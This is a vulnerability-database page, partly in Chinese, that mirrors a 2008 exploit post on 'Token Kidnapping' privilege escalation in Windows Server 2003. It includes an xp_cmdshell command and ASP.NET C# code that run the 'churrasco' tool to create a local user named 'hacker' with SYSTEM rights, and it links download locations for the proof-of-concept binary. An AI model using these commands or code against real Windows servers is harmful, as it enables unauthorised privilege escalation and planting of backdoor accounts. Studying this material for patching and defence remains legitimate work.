Microsoft Windows Server 2003 - Token Kidnapping Local

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056896 漏洞类型
发布时间 2008-10-08 更新时间 2008-10-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/6705
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) 
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows 
services accounts can impersonate.  Other process (not services) that can impersonate are IIS 6 worker processes 
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide 
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6705.zip (2008-Churrasco.zip)

Enjoy.

Cesar.

# milw0rm.com [2008-10-08]